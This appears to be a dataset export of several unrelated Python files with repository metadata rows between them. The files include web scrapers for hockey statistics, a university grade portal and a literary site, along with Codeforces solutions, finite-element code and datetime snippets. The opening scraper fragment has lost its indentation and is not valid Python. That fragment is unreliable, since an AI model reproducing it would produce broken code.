url9 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=pm'
response9 = requests.get(url9)
soup9 = BeautifulSoup(response9.text, 'html.parser')
table9 = soup9.findAll('td')
infostrings9 = []
for t in range(27, len(table9), 31):
a = 0
string = ""
while a < 5 and a + t < len(table9):
string += table9[t + a].get_text() + "\n"
a += 1
string += table9[t + 21].get_text() + "\n"
infostrings9.append(string)
# National Skater Shooting % Stats
url10 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=shpct'
response10 = requests.get(url10)
soup10 = BeautifulSoup(response10.text, 'html.parser')
table10 = soup10.findAll('td')
infostrings10 = []
for t in range(27, len(table10), 31):
a = 0
string = ""
while a < 5 and a + t < len(table10):
string += table10[t + a].get_text() + "\n"
a += 1
string += table10[t + 24].get_text() + "\n"
infostrings10.append(string)
# National Skater Faceoff % Stats
url11 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=fpct'
response11 = requests.get(url11)
soup11 = BeautifulSoup(response11.text, 'html.parser')
table11 = soup11.findAll('td')
infostrings11 = []
for t in range(27, len(table11), 31):
a = 0
string = ""
while a < 5 and a + t < len(table11):
string += table11[t + a].get_text() + "\n"
a += 1
string += table11[t + 27].get_text() + "\n"
infostrings11.append(string)
# National Skater Blocked Shots Stats
url12 = 'http://collegehockeyinc.com/stats/filters19.php?target=ALL&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=1&end=224&wins=on&losses=on&ties=on&otgames=&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=&limitn=&limitt=&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=blk'
response12 = requests.get(url12)
soup12 = BeautifulSoup(response12.text, 'html.parser')
table12 = soup12.findAll('td')
infostrings12 = []
for t in range(28, len(table12), 32):
a = 0
string = ""
while a < 5 and a + t < len(table12):
string += table12[t + a].get_text() + "\n"
a += 1
string += table12[t + 28].get_text() + "\n"
infostrings12.append(string)
# National Main Goaltender Stats
url13 = 'http://collegehockeyinc.com/stats/filters19.php?stats=goalie'
response13 = requests.get(url13)
soup13 = BeautifulSoup(response13.text, 'html.parser')
table13 = soup13.findAll('td')
infostrings13 = []
for t in range(17, 70 * 20 + 17, 20):
a = 0
string = ""
while a < 4 and a + t < len(table13):
string += table13[t + a].get_text() + "\n"
a += 1
string += table13[t + 13].get_text() + "\n"
string += table13[t + 14].get_text() + "\n"
infostrings13.append(string) | 50.677725 | 503 | 0.660713 | 1,837 | 10,693 | 3.831247 | 0.126293 | 0.02586 | 0.02728 | 0.047741 | 0.605001 | 0.577011 | 0.540068 | 0.533248 | 0.489486 | 0.489486 | 0 | 0.062617 | 0.150192 | 10,693 | 211 | 504 | 50.677725 | 0.711896 | 0.039278 | 0 | 0.232432 | 0 | 0.048649 | 0.47791 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021622 | 0 | 0.021622 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2dcf951d5069ea7d7ae3174ad3cf8b3944c87c4 | 517 | py | Python | codeforces/O.py | pavponn/machine-learning | 95ab573556a72fb5d16761cb8136d2896ae55263 | [
"MIT"
] | null | null | null | codeforces/O.py | pavponn/machine-learning | 95ab573556a72fb5d16761cb8136d2896ae55263 | [
"MIT"
] | null | null | null | codeforces/O.py | pavponn/machine-learning | 95ab573556a72fb5d16761cb8136d2896ae55263 | [
"MIT"
] | null | null | null |
k = int(input())
n = int(input())
objects = []
for i in range(n):
x_i, y_i = [int(a) for a in input().split()]
objects.append((x_i, y_i))
left, right = 0, 0
for obj in objects:
left += (obj[1] ** 2) / n
p_x = [0 for _ in range(k + 1)]
e_y_by_x = [0 for _ in range(k + 1)]
for obj in objects:
p_x[obj[0]] += 1.0 / (n + 0.0)
e_y_by_x[obj[0]] += obj[1] / (n + 0.0)
for i in range(k + 1):
if p_x[i] == 0:
continue
right += e_y_by_x[i] * e_y_by_x[i] / p_x[i]
print(left - right)
| 19.148148 | 48 | 0.526112 | 113 | 517 | 2.212389 | 0.230089 | 0.048 | 0.064 | 0.08 | 0.16 | 0.112 | 0.112 | 0 | 0 | 0 | 0 | 0.050265 | 0.268859 | 517 | 26 | 49 | 19.884615 | 0.611111 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2de29b15c295568077b2e97a9df7c80475313af | 5,455 | py | Python | SpiderOfZFSystem/spider.py | mental2008/python_spider | fa1b039046a3ca4597064f0c3568e87a43ff551f | [
"MIT"
] | 1 | 2017-07-28T16:36:30.000Z | 2017-07-28T16:36:30.000Z | SpiderOfZFSystem/spider.py | mental2008/python_spider | fa1b039046a3ca4597064f0c3568e87a43ff551f | [
"MIT"
] | null | null | null | SpiderOfZFSystem/spider.py | mental2008/python_spider | fa1b039046a3ca4597064f0c3568e87a43ff551f | [
"MIT"
] | null | null | null | import requests
import os
from urllib import parse
from bs4 import BeautifulSoup
import bs4
def getResponse(url, hd):
try:
response = requests.get(url, timeout = 30, headers = hd)
response.raise_for_status()
response.encoding = response.apparent_encoding
return response
except:
return "Error"
def downloadCheckCode(url):
url = url + "CheckCode.aspx"
hd = {'user-agent': 'Mozilla/5.0'}
response = getResponse(url, hd)
if response == "Error":
print("验证码下载错误...")
return "Error"
else:
print("正在下载验证码...")
with open("CheckCode.png", 'wb') as f:
f.write(response.content)
print("验证码已下载")
os.startfile("CheckCode.png")
def getViewState(soup):
return soup.find('input', attrs = {'name': '__VIEWSTATE'})['value']
def login(url):
url = url + "default2.aspx"
hd = {'user-agent': 'Mozilla/5.0'}
response = getResponse(url, hd)
if response == "Error":
print("登陆失败...")
else:
html = response.text
soup = BeautifulSoup(html, "html.parser")
__viewstate = getViewState(soup)
data = {'__VIEWSTATE': '',
'txtUserName': '',
'TextBox2': '',
'txtSecretCode': '',
'RadioButtonList1': '\xd1\xa7\xc9\xfa',
'Button1': '',
'lbLanguage:': '',
'hidPdrs': '',
'hidsc': ''}
data['__VIEWSTATE'] = __viewstate
studentID = input("请输入学号: ")
data['TextBox2'] = input("请输入密码: ")
data['txtSecretCode'] = input("请输入图片中的验证码: ")
data['txtUserName'] = studentID
print("登陆中...")
s = requests.session()
s.post(url, data = data)
try:
r = s.get("http://xsweb.scuteo.com/(klbbxierheaus4ftnggitnuz)/xs_main.aspx?xh=" + studentID, timeout = 30, headers = hd)
newsoup = BeautifulSoup(r.text, 'html.parser')
name = newsoup.find('span', attrs = {'id': 'xhxm'}).text[:-2]
print("登陆成功!欢迎你,{0}同学".format(name))
except:
print("登陆失败...")
return "Error"
return s, studentID, name
def queryScore(s, studentID, name):
url = "http://xsweb.scuteo.com/(klbbxierheaus4ftnggitnuz)/xscjcx.aspx?xh=" + studentID + "&xm=" + parse.quote(name.encode('gb2312')) + "&gnmkdm=N121605"
hd = {'Referer': url, 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
'Upgrade-Insecure-Requests': '1', 'Host': 'xsweb.scuteo.com',
'Origin': 'http://xsweb.scuteo.com', 'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.8'}
response = s.get(url, headers = hd)
soup = BeautifulSoup(response.text, 'html.parser')
print("正在查询成绩...")
__viewstate = getViewState(soup)
data = {'__EVENTTARGET': '', '__EVENTARGUMENT': '',
'__VIEWSTATE': __viewstate, 'hidLanguage': '',
'ddlXN': '', 'ddlXQ': '','ddl_kcxz': '',
'btn_zcj': '\xc0\xfa\xc4\xea\xb3\xc9\xbc\xa8'}
r = s.post(url, headers = hd, data = data)
return r.text
def printFormat(text, width):
def is_chinese(char):
if char >= u'\u4e00' and char <= u'\u9fa5':
return True
else:
if char == 'Ⅰ' or char == '(' or char == ')' or char == 'Ⅲ' or char == 'Ⅱ':
return True
else :
return False
stext = str(text)
cn_count = 0
for u in stext:
if is_chinese(u):
cn_count = cn_count + 1
return stext + " " * (width - cn_count - len(stext))
def printScore(html):
soup = BeautifulSoup(html, 'html.parser')
table = soup.find('table', attrs = {'class': 'datelist'})
#tpt = '{0:{9}<10}{1:{9}<3}{2:{9}<20}{3:{9}<7}{4:{9}<5}{5:{9}<5}{6:{9}<5}{7:{9}<15}{8:{9}<3}'
mp = [2, 3, 5, 6, 8, 9, 10, 14, 17]
num = 1
for tr in table.contents:
count = 1
ulist = []
if isinstance(tr, bs4.element.Tag):
for td in tr.contents:
if count in mp:
ulist.append(td.string)
count = count + 1
#print(tpt.format(ulist[0], ulist[1], ulist[2], ulist[3], ulist[4], ulist[5], ulist[6], ulist[7], ulist[8], chr(12288)))
if not num == 1:
ulist[5] = ulist[5][3:]
print(printFormat(ulist[0], 10) + printFormat(ulist[1], 5) +
printFormat(ulist[2], 30) + printFormat(ulist[3], 10) +
printFormat(ulist[4], 10) + printFormat(ulist[5], 10) +
printFormat(ulist[6], 10) + printFormat(ulist[7], 25) +
printFormat(ulist[8], 5))
num = num + 1
if __name__ == "__main__":
url = "http://xsweb.scuteo.com/(klbbxierheaus4ftnggitnuz)/" #original url
if not downloadCheckCode(url) == "Error":
loginData = login(url)
if not loginData == "Error":
s = loginData[0]
studentID = loginData[1]
name = loginData[2]
html = queryScore(s, studentID, name)
printScore(html)
| 38.415493 | 159 | 0.538038 | 636 | 5,455 | 4.556604 | 0.353774 | 0.049689 | 0.024155 | 0.024845 | 0.120083 | 0.077985 | 0.046929 | 0.046929 | 0.046929 | 0.046929 | 0 | 0.045185 | 0.290009 | 5,455 | 141 | 160 | 38.687943 | 0.701523 | 0.04088 | 0 | 0.179688 | 0 | 0.015625 | 0.246855 | 0.034395 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.039063 | 0.007813 | 0.1875 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2e0d3349b34b040bec17e174ec417f5654fba07 | 1,563 | py | Python | disjoint sets union/2F.py | iammanish17/CodeforcesEdu | 961543b332c773010320bd0b2e9d4a4b1c8dc0ea | [
"MIT"
] | 6 | 2020-09-14T19:16:23.000Z | 2021-12-10T19:07:51.000Z | disjoint sets union/2F.py | iammanish17/CodeforcesEdu | 961543b332c773010320bd0b2e9d4a4b1c8dc0ea | [
"MIT"
] | null | null | null | disjoint sets union/2F.py | iammanish17/CodeforcesEdu | 961543b332c773010320bd0b2e9d4a4b1c8dc0ea | [
"MIT"
] | 1 | 2021-08-12T19:37:22.000Z | 2021-08-12T19:37:22.000Z | # By manish.17, contest: ITMO Academy. СНМ 2, problem: (F) Dense spanning tree
# https://codeforces.com/profile/manish.17
class DisjointSetUnion:
def __init__(self, n):
self.parent = [*range(n+1)]
self.size = [1]*(n+1)
def get(self, a):
"""Returns the identifier (parent) of the set to which a belongs to!"""
if self.parent[a] == a:
return a
x = a
while a != self.parent[a]:
a = self.parent[a]
while x != self.parent[x]:
self.parent[x], x = a, self.parent[x]
return a
def union(self, a, b):
"""Join two sets that contain a and b!"""
a, b = self.get(a), self.get(b)
if a != b:
if self.size[a] > self.size[b]:
a, b = b, a
self.parent[a] = b
self.size[b] += self.size[a]
import sys
input = sys.stdin.readline
n, m = map(int, input().split())
y = []
for _ in range(m):
b, e, w = map(int, input().split())
y += [[w, b, e]]
y = sorted(y, key=lambda x: x[0])
ans = 10**18
found = False
for i in range(len(y)):
dsu = DisjointSetUnion(n)
cnt = 0
m1 = 10**18
m2 = -10**18
for j in range(i, len(y)):
p, q, r = y[j]
if dsu.get(q) != dsu.get(r):
dsu.union(q, r)
cnt += 1
m1 = min(m1, p)
m2 = max(m2, p)
if cnt == n-1:break
if cnt == n-1:
found = True
ans = min(ans, m2-m1)
else:break
if not found:
print("NO")
else:
print("YES")
print(ans)
| 24.046154 | 79 | 0.486244 | 248 | 1,563 | 3.044355 | 0.366935 | 0.10596 | 0.058278 | 0.047682 | 0.045033 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032448 | 0.349328 | 1,563 | 64 | 80 | 24.421875 | 0.709931 | 0.140755 | 0 | 0.038462 | 0 | 0 | 0.003757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.019231 | 0 | 0.134615 | 0.057692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2e1d5ed6c66a448128eda6819d43657d1b0440a | 4,384 | py | Python | one_spider/spiders/one.py | guzdy/ONE_SPIDER | 6676be923342e79c76336fd56b96c3eafb335f90 | [
"MIT"
] | null | null | null | one_spider/spiders/one.py | guzdy/ONE_SPIDER | 6676be923342e79c76336fd56b96c3eafb335f90 | [
"MIT"
] | null | null | null | one_spider/spiders/one.py | guzdy/ONE_SPIDER | 6676be923342e79c76336fd56b96c3eafb335f90 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import scrapy
from one_spider.items import OneItemArticle, OneItemImage, OneItemQuestion
from scrapy.loader import ItemLoader
import html2text
class OneSpider(scrapy.Spider):
name = 'one'
start_urls = ['http://wufazhuce.com/']
def parse(self, response):
"""分析首页,获取最新数据"""
# image 部分
img_url_latest = response.xpath('//div[@class="fp-one"]//div[@class="item active"]'
'/a/@href').extract_first()
print(img_url_latest)
img_num_latest = int(img_url_latest.split('/')[-1])
print(img_num_latest)
for num in range(14, img_num_latest+1): # 14页开始
img_url = 'http://wufazhuce.com/one/'+str(num)
yield response.follow(img_url, callback=self.parse_img)
# article 部分
article_url_latest = response.xpath('//div[@class="fp-one-articulo"]//p[@class='
'"one-articulo-titulo"]/a/@href').extract_first()
print(article_url_latest)
article_num_latest = int(article_url_latest.split('/')[-1])
print(article_num_latest)
for num in range(55, article_num_latest+1): # 55
# 实际上顺序是很混乱的
article_url = 'http://wufazhuce.com/article/'+str(num)
yield response.follow(article_url, callback=self.parse_article)
# question 部分
question_url_latest = response.xpath('//div[@class="fp-one-cuestion"]//p[@class='
'"one-cuestion-titulo"]/a/@href').extract_first()
print(question_url_latest)
question_num_latest = int(question_url_latest.split('/')[-1])
print(question_num_latest)
for num in range(8, question_num_latest+1): # 8
question_url = 'http://wufazhuce.com/question/'+str(num)
yield response.follow(question_url, callback=self.parse_question)
def parse_img(self, response):
print('抓取{}成功,正在抓取数据'.format(response.url))
loader = ItemLoader(item=OneItemImage(), response=response)
loader.add_xpath('img_url', '//div[@class="one-imagen"]/img/@src')
img_num = response.xpath('//title/text()').re('\d+')
loader.add_value('img_num', img_num)
description = response.xpath('//div[@class="one-cita"]/text()').extract_first().strip()
loader.add_value('description', description)
img_info = response.xpath('string(//div[@class="one-imagen-leyenda"])').extract_first().strip()
loader.add_value('img_info', img_info)
date_raw = response.xpath('//div[@class="one-pubdate"]/p/text()').extract()
loader.add_value('date', date_raw[0]+' '+date_raw[1])
loader.add_value('url', response.url)
return loader.load_item()
def parse_article(self, response):
print('抓取{}成功,正在抓取数据'.format(response.url))
loader = ItemLoader(item=OneItemArticle(), response=response)
loader.add_xpath('description', '//meta[@name="description"]/@content')
title = response.xpath('string(//title)').extract_first().strip(' - 「ONE · 一个」').strip()
loader.add_value('title', title)
author = response.xpath('string(//p[@class="articulo-autor"])').extract_first()\
.strip().strip('作者/')
loader.add_value('author', author)
text_raw = response.xpath('//div[@class="articulo-contenido"]').extract_first()
loader.add_value('article', html2text.html2text(text_raw))
loader.add_value('url', response.url)
return loader.load_item()
def parse_question(self, response):
print('抓取{}成功,正在抓取数据'.format(response.url))
loader = ItemLoader(item=OneItemQuestion(), response=response)
quest = response.xpath('//h4/text()').extract_first().strip()
loader.add_value('quest', quest)
quest_detail = response.xpath('//div[@class="cuestion-contenido"]/text()').extract_first().strip()
loader.add_value('quest_detail', quest_detail)
answer_raw = response.xpath('//div[@class="cuestion-contenido"][2]').extract_first()
loader.add_value('answer', html2text.html2text(answer_raw))
author = response.xpath('//h4[2]/text()').extract_first().strip()
if author:
loader.add_value('author', author)
loader.add_value('url', response.url)
return loader.load_item()
| 49.258427 | 106 | 0.624088 | 526 | 4,384 | 5.01711 | 0.195817 | 0.054566 | 0.074271 | 0.06366 | 0.454718 | 0.303524 | 0.216749 | 0.203486 | 0.133384 | 0.133384 | 0 | 0.008095 | 0.210995 | 4,384 | 88 | 107 | 49.818182 | 0.754553 | 0.020073 | 0 | 0.150685 | 0 | 0 | 0.20014 | 0.11957 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054795 | false | 0 | 0.054795 | 0 | 0.191781 | 0.123288 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2e204a847aae355756265cbadb65a2b2d664e9b | 7,410 | py | Python | simfempy/fems/fem.py | beckerrh/simfempy | 10bf30f330d921bffaa8572bbd73286da5971905 | [
"MIT"
] | null | null | null | simfempy/fems/fem.py | beckerrh/simfempy | 10bf30f330d921bffaa8572bbd73286da5971905 | [
"MIT"
] | null | null | null | simfempy/fems/fem.py | beckerrh/simfempy | 10bf30f330d921bffaa8572bbd73286da5971905 | [
"MIT"
] | 1 | 2021-06-09T15:49:51.000Z | 2021-06-09T15:49:51.000Z | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 4 18:14:29 2016
@author: becker
"""
import numpy as np
import numpy.linalg as linalg
from simfempy import fems
from simfempy.meshes.simplexmesh import SimplexMesh
import scipy.sparse as sparse
#=================================================================#
class Fem(object):
def __repr__(self):
repr = f"{self.__class__.__name__}"
return repr
def __init__(self, **kwargs):
mesh = kwargs.get('mesh', None)
if mesh is not None: self.setMesh(mesh)
def setMesh(self, mesh, innersides=False):
self.mesh = mesh
self.nloc = self.nlocal()
if innersides: self.mesh.constructInnerFaces()
def computeStencilCell(self, dofspercell):
self.cols = np.tile(dofspercell, self.nloc).ravel()
self.rows = np.repeat(dofspercell, self.nloc).ravel()
#Alternative
# self.rows = dofspercell.repeat(self.nloc).reshape(self.mesh.ncells, self.nloc, self.nloc)
# self.cols = self.rows.swapaxes(1, 2)
# self.cols = self.cols.reshape(-1)
# self.rows = self.rows.reshape(-1)
# def computeStencilInnerSidesCell(self, dofspercell):
# nloc, faces, cellsOfFaces = self.nloc, self.mesh.faces, self.mesh.cellsOfFaces
# # print(f"{faces=}")
# # print(f"{cellsOfFaces=}")
# innerfaces = cellsOfFaces[:,1]>=0
# cellsOfInteriorFaces= cellsOfFaces[innerfaces]
# self.cellsOfInteriorFaces = cellsOfInteriorFaces
# self.innerfaces = innerfaces
# return
# # print(f"{innerfaces=}")
# print(f"{cellsOfInteriorFaces=}")
# raise NotImplementedError(f"no")
# ncells, nloc = dofspercell.shape[0], dofspercell.shape[1]
# print(f"{ncells=} {nloc=}")
# print(f"{dofspercell[cellsOfInteriorFaces,:].shape=}")
# rows = dofspercell[cellsOfInteriorFaces,:].repeat(nloc)
# cols = np.tile(dofspercell[cellsOfInteriorFaces,:],nloc)
# print(f"{rows=}")
# print(f"{cols=}")
def interpolateCell(self, f):
if isinstance(f, dict):
b = np.zeros(self.mesh.ncells)
for label, fct in f.items():
if fct is None: continue
cells = self.mesh.cellsoflabel[label]
xc, yc, zc = self.mesh.pointsc[cells].T
b[cells] = fct(xc, yc, zc)
return b
else:
xc, yc, zc = self.mesh.pointsc.T
return f(xc, yc, zc)
def computeMatrixDiffusion(self, coeff):
ndofs = self.nunknowns()
# matxx = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 0], self.cellgrads[:, :, 0])
# matyy = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 1], self.cellgrads[:, :, 1])
# matzz = np.einsum('nk,nl->nkl', self.cellgrads[:, :, 2], self.cellgrads[:, :, 2])
# mat = ( (matxx+matyy+matzz).T*self.mesh.dV*coeff).T.ravel()
cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
mat = np.einsum('n,nil,njl->nij', self.mesh.dV*coeff, cellgrads, cellgrads).ravel()
return sparse.coo_matrix((mat, (self.rows, self.cols)), shape=(ndofs, ndofs)).tocsr()
def computeFormDiffusion(self, du, u, coeff):
doc = self.dofspercell()
cellgrads = self.cellgrads[:,:,:self.mesh.dimension]
r = np.einsum('n,nil,njl,nj->ni', self.mesh.dV*coeff, cellgrads, cellgrads, u[doc])
np.add.at(du, doc, r)
def computeMatrixLps(self, betart, **kwargs):
param = kwargs.pop('lpsparam', 0.1)
dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
nloc, dofspercell = self.nlocal(), self.dofspercell()
ci = self.mesh.cellsOfInteriorFaces
ci0, ci1 = ci[:,0], ci[:,1]
normalsS = self.mesh.normals[self.mesh.innerfaces]
dS = linalg.norm(normalsS, axis=1)
scale = 0.5*(dV[ci0]+ dV[ci1])
betan = np.absolute(betart[self.mesh.innerfaces])
# betan = 0.5*(np.linalg.norm(betaC[ci0],axis=1)+ np.linalg.norm(betaC[ci1],axis=1))
scale *= param*dS*betan
cg0 = self.cellgrads[ci0, :, :]
cg1 = self.cellgrads[ci1, :, :]
mat00 = np.einsum('nki,nli,n->nkl', cg0, cg0, scale)
mat01 = np.einsum('nki,nli,n->nkl', cg0, cg1, -scale)
mat10 = np.einsum('nki,nli,n->nkl', cg1, cg0, -scale)
mat11 = np.einsum('nki,nli,n->nkl', cg1, cg1, scale)
rows0 = dofspercell[ci0,:].repeat(nloc)
cols0 = np.tile(dofspercell[ci0,:],nloc).reshape(-1)
rows1 = dofspercell[ci1,:].repeat(nloc)
cols1 = np.tile(dofspercell[ci1,:],nloc).reshape(-1)
A00 = sparse.coo_matrix((mat00.reshape(-1), (rows0, cols0)), shape=(ndofs, ndofs))
A01 = sparse.coo_matrix((mat01.reshape(-1), (rows0, cols1)), shape=(ndofs, ndofs))
A10 = sparse.coo_matrix((mat10.reshape(-1), (rows1, cols0)), shape=(ndofs, ndofs))
A11 = sparse.coo_matrix((mat11.reshape(-1), (rows1, cols1)), shape=(ndofs, ndofs))
return A00+A01+A10+A11
def computeFormLps(self, du, u, betart, **kwargs):
param = kwargs.pop('lpsparam', 0.1)
dimension, dV, ndofs = self.mesh.dimension, self.mesh.dV, self.nunknowns()
nloc, dofspercell = self.nlocal(), self.dofspercell()
ci = self.mesh.cellsOfInteriorFaces
ci0, ci1 = ci[:,0], ci[:,1]
normalsS = self.mesh.normals[self.mesh.innerfaces]
dS = linalg.norm(normalsS, axis=1)
scale = 0.5*(dV[ci0]+ dV[ci1])
betan = np.absolute(betart[self.mesh.innerfaces])
scale *= param*dS*betan
cg0 = self.cellgrads[ci0, :, :]
cg1 = self.cellgrads[ci1, :, :]
r = np.einsum('nki,nli,n,nl->nk', cg0, cg0, scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
np.add.at(du, dofspercell[ci0,:], r)
# mat01 = np.einsum('nki,nli,n,nl->nk', cg0, cg1, -scale, u[dofspercell[ci1,:]])
# np.add.at(du, dofspercell[ci0,:], mat01)
r = np.einsum('nki,nli,n,nl->nk', cg1, cg0, -scale, u[dofspercell[ci0,:]]-u[dofspercell[ci1,:]])
np.add.at(du, dofspercell[ci1,:], r)
# mat11 = np.einsum('nki,nli,n,nl->nk', cg1, cg1, scale, u[dofspercell[ci1,:]])
# np.add.at(du, dofspercell[ci1,:], mat11)
def computeFormConvection(self, du, u, data, method, **kwargs):
if method[:4] == 'supg':
self.computeFormTransportSupg(du, u, data, method)
elif method == 'upwalg':
self.computeFormTransportUpwindAlg(du, u, data)
elif method[:3] == 'upw':
self.computeFormTransportUpwind(du, u, data, method)
elif method == 'lps':
self.computeFormTransportLps(du, u, data, **kwargs)
else:
raise NotImplementedError(f"{method=}")
def computeMatrixConvection(self, data, method, **kwargs):
if method[:4] == 'supg':
return self.computeMatrixTransportSupg(data, method)
elif method == 'upwalg':
return self.computeMatrixTransportUpwindAlg(data)
elif method[:3] == 'upw':
return self.computeMatrixTransportUpwind(data, method)
elif method == 'lps':
return self.computeMatrixTransportLps(data, **kwargs)
else:
raise NotImplementedError(f"{method=}")
# ------------------------------------- #
if __name__ == '__main__':
trimesh = SimplexMesh(geomname="backwardfacingstep", hmean=0.3)
| 46.898734 | 104 | 0.588394 | 888 | 7,410 | 4.877252 | 0.203829 | 0.049873 | 0.020319 | 0.02586 | 0.392057 | 0.363426 | 0.305241 | 0.232279 | 0.211499 | 0.208728 | 0 | 0.027445 | 0.232928 | 7,410 | 157 | 105 | 47.197452 | 0.734518 | 0.244399 | 0 | 0.361111 | 0 | 0 | 0.043063 | 0.004505 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101852 | false | 0 | 0.046296 | 0 | 0.240741 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2e28eb703a3cba58f973912a71313b82fe8577c | 1,476 | py | Python | time/time/timedelta_test.py | Nobodylesszb/python_module | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | [
"MIT"
] | null | null | null | time/time/timedelta_test.py | Nobodylesszb/python_module | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | [
"MIT"
] | null | null | null | time/time/timedelta_test.py | Nobodylesszb/python_module | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | [
"MIT"
] | null | null | null | #获取上个月第一天和最后一天的日期
import datetime
import time
# today = datetime.date.today()
# print(today)
# mlast_day = datetime.date(today.year, today.month, 1) - datetime.timedelta(1)
# print(mlast_day)
# """
# output:
# 2019-06-11
# 2019-05-31
# """
# mfirst_day = datetime.date(mlast_day.year, mlast_day.month, 1)
# print(mfirst_day) # 2019-05-01
# #获得时间差
# start_time = datetime.datetime.now()
# time.sleep(5)
# end_time = datetime.datetime.now()
# print(start_time)
# print(end_time)
# """
# output:
# 2019-06-11 13:56:57.681902
# 2019-06-11 13:57:02.682107
# """
# d = (end_time - start_time).seconds
# print(d) # 5
# #计算当前时间向后8个小时的时间
# d1 = datetime.datetime.now()
# d2 = d1 + datetime.timedelta(hours = 8)
# print(d2) #2019-06-11 21:58:51.210277
# # 计算上周一和周日的日期
# today = datetime.date.today()
# today_weekday = today.isoweekday()
# print(today_weekday)
# last_sunday = today - datetime.timedelta(days=today_weekday)
